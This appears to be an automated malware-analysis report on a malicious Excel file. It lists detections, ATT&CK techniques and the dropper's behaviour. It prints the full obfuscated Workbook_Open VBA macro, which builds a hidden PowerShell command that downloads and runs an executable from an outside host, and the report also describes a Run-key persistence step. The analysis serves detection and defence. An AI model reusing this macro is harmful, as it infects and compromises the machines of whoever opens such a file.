MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
The Workbook_Open macro in this Excel file is designed to execute a second-stage payload. It constructs a command to run PowerShell, which then downloads and executes a file from the URL "http://cloudphotos.party/fogliodati/12345.exe". The macro also attempts to establish persistence by writing to the Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy.
Heuristics 6
-
ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBA
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2762 bytes |
SHA-256: b0d928045f43dce3daecda9e99cd402d181f21622c186f25ff83543b3a073bfc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim dublomd As String
Randomize
dublomd = Int(Rnd * 9002762#)
If msoShadowStyleOuterShadow > 0.3 Then
orangeapple = dublomd
cityofcountry = "(\""{0" + "}{2"
helycopterf = santalokko + orangeapple + ".ex" + "e"""
hoteldesert = cityofcountry + "}{1}" + "{3}{" + duncanlond + "cloud" + "photos.pa" + "rty/fogl" + "iodati\"",\""$Des\" + orangeapple + ".e" + "xe\"")" + "}"
monitordriverg = stickstar + saboteurs + hoteldesert + helycopterf
Shell amestision + monitordriverg, contverresError
End If
End Sub
Function fungacids()
fungacids = "wN" + "loA" + "DfI" + maallokser + "OK" + "E(" + "\""htt"
End Function
Function hellomisterbn()
hellomisterbn = "'Sy','" + "te'," + "'s','m" + ".Ne','en" + "t','t.W" + "e" + "b','C"
End Function
Function amestision()
If msoTabStopRight <> 0 Then
amestision = "CMd /c"" POwe" + "rSHeLL -n" + "olO -e" + "xEcu b" + "ypAss -nO" + "NI -nO" + "prOF" + "i -wi" + "Nd HiD" + "DeN """
End If
End Function
Function duncanlond()
duncanlond = "5}{6" + "}{" + "4}\""-f" + hellomisterbn + "Li')" + ").dO" + fungacids + "p:/" + "/"
End Function
Function maallokser()
maallokser = "LE.i" + "nV"
End Function
Function dangapollwater()
dangapollwater = "0mk6:" + ":geTF" + "olDe" + poseidonus + "H(" + "\""D" + "eskt" + "op" + "\"");("
End Function
Function saboteurs()
saboteurs = "do{&(\""{1}{0}\"" -f'ep','sle') 33;${D`es} = $7d" + dangapollwater + "&(\""{0}{1}{2}\"" -f'Ne','w-','Obj" + "ect') "
End Function
Function stickstar()
stickstar = "$7d0mK6 = [TyPE](\""{1}{0}{3}{2}\"" -f 'on','ENVIr','Nt','mE') ; "
End Function
Function santalokko()
If 89 <> 0 Then
santalokko = "whil" + "e(!" + "$" + "{?});&(\""{0}{2}{3}{1}\""-" + "f 'St'" + ",'oces" + "s','a" + "rt','-P" + "r') $Des\"
End If
End Function
Function poseidonus()
poseidonus = "RP" + "A" + "t"
End Function
Attribute VB_Name = "Foglio18"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.